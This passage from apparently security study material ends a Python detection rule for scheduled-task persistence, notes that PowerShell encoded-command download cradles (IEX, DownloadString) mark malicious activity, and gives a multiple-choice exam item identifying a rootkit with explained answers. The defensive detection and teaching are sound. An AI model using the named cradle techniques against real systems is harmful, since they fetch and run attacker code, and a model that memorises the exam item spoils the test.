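        if image == "schtasks.exe" and "/create" in e["cmdline"].lower() and parent_is_script:
            findings.append(("scheduled_task_persistence", e["pid"], e["cmdline"]))
    return findings
```

Decoding the argument matters more than spotting the flag: plenty of management tooling uses `-EncodedCommand` legitimately, and it is the cradle inside (IEX, DownloadString, reflective assembly loads) that separates the finance-workstation alert from the backup script.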
After a suspected compromise, a server's local tools report sshd listening on port 22, but netstat and the EDR console fail to show the process that owns the socket. A reboot does not remove the issue, and firmware integrity checks pass. Which malware type is most likely installed?
A.Spyware, because hidden software is often used to collect credentials and data.
B.Rootkit, because it is designed to hide processes, drivers, or sockets from normal security tools.
C.Ransomware, because the server remains operational while still hiding evidence.
D.Logic bomb, because the issue persists after reboot and could trigger later.
AnswerB
Rootkit is the best answer because the core clue is stealth: the service exists, but common tools cannot attribute the socket to a process. That suggests kernel- or driver-level concealment rather than a normal user-space infection. The persistence after reboot further supports a deeply embedded implant that survives simple cleanup attempts.
Why this answer
Option B is correct because a rootkit is specifically designed to hide its presence from the operating system and security tools by intercepting system calls (e.g., those used by netstat and EDR) to conceal processes, drivers, and network sockets. The persistence after reboot and clean firmware integrity checks indicate the rootkit is installed at the kernel or boot level, bypassing user-mode detection.
Exam trap
The trap here is that candidates may confuse persistence with logic bombs or assume that any hidden software is spyware, but the key technical indicator is the ability to hide a socket from netstat and EDR while surviving reboot, which is a hallmark of kernel-level rootkits.
How to eliminate wrong answers
Option A is wrong because spyware typically focuses on data collection and does not inherently possess the capability to hide processes or sockets from netstat and EDR; its stealth is usually limited to user-level concealment, not kernel-level hooking. Option C is wrong because ransomware is designed to encrypt files and demand payment, not to persistently hide processes or sockets; its primary goal is extortion through denial of access to data, not stealthy long-term persistence. Option D is wrong because a logic bomb is a dormant piece of code triggered by a specific condition (e.g., date or event), not a persistent, actively hiding malware that survives reboot and evades process enumeration.